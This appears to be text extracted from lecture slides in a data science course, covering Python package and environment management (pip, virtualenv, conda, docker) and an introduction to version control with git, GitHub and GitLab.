Included with Python 3 by default
Included with the Anaconda distribution

pip install numpy

Virtual environments can be set up using virtualenv

Or you can use conda : Anaconda's package manager and virtual environment manager in one
Includes more than just Python packages: R and other tools are included as well
Hence it also allows you to set up clean, isolated R workspaces
Good rule of thumb: a new conda environment for each project
https://conda.io/projects/conda/en/latest/user-guide/getting-started.html

To isolate a complete environment, virtualization and containerization tools like docker are commonly used as well

81 Versioning systems

Something else to read up on is the use of version control systems

"Version control systems are a category of software tools that help a software team manage changes to source code over time. Version control software keeps track of every modification to the code in a special kind of database. If a mistake is made, developers can turn back the clock and compare earlier versions of the code to help fix the mistake while minimizing disruption to all team members."

Even a good idea to use this for a "team of one"
SVN, CVS, Mercurial, Bazaar

Most common one is git , however

82 git

"Git was created by Linus Torvalds in 2005 for development of the Linux kernel, with other kernel developers contributing to its initial development."

"As with most other distributed version-control systems, and unlike most client-server systems, every Git directory on every computer is a full-fledged repository with complete history and full version-tracking abilities, independent of network access or a central server."

"Git is free and open-source software distributed under the terms of the GNU General Public License version 2."

GitHub: hosts git repositories for you (free) GitLab: an alternative

83 git

84 git

A good way to practice is to put your coding and data science projects, even your blog, on GitHub

E.g. feel free to try this for Assignment 2

Many data science recruiters will look at your GitHub profile to see the (personal) projects you've worked on and collaborated on
